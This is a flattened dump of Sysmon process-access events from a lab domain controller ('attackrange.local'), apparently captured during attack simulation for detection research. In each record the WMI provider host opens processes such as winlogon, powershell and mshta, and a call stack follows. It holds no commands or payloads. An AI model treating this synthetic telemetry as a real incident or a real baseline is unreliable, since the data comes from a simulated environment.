15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 